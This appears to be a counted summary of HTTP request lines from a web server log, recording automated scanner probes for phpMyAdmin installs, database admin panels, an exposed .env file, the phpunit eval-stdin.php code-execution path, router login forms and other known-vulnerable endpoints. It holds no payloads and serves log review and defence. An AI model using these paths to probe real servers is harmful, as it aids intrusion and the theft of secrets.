1 GET /phpMyAdmin-2.6.1-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.2-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.2-pl1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.2-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.3-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.3-rc1/ HTTP/1.1
2 GET /phpMyAdmin-2.6.3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl3/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-pl4/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.6.4/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-pl1/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-pl2/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.7.0/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0-beta1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0-rc2/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.2/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.3/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0.4/ HTTP/1.1
1 GET /phpMyAdmin-2.8.0/ HTTP/1.1
1 GET /phpMyAdmin-2.8.1-rc1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.1/ HTTP/1.1
1 GET /phpMyAdmin-2.8.2/ HTTP/1.1
1 GET /phpMyAdmin-2/ HTTP/1.1
1 GET /phpMyAdmin/ HTTP/1.1
1 GET /phpMyAdmin2/ HTTP/1.1
1 GET /phpmanager/ HTTP/1.1
1 GET /phpmy-admin/ HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin2/ HTTP/1.1
1 GET /pma/ HTTP/1.1
1 GET /pma2005/ HTTP/1.1
1 GET /public/.env HTTP/1.1
1 GET /robots.txt HTTP/1.1
1 GET /solr/admin/info/system?wt=json HTTP/1.1
1 GET /sqlite/main.php HTTP/1.1
1 GET /sqlitemanager/main.php HTTP/1.1
1 GET /sqlmanager/ HTTP/1.1
1 GET /sqlweb/ HTTP/1.1
1 GET /static/admin/javascript/hetong.js HTTP/1.1
1 GET /systembc/password.php HTTP/1.0
1 GET /test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php HTTP/1.1
3 GET /upl.php HTTP/1.1
1 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
1 GET /webadmin/ HTTP/1.1
1 GET /webdb/ HTTP/1.1
1 GET /websql/ HTTP/1.1
1 GET http[:]//ip[.]bablosoft[.]com/?Z78126052220Q1 HTTP/1.1
2 POST /Autodiscover/Autodiscover.xml HTTP/1.1
4 POST /boaform/admin/formLogin HTTP/1.1
2 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1
3 PRI * HTTP/2.0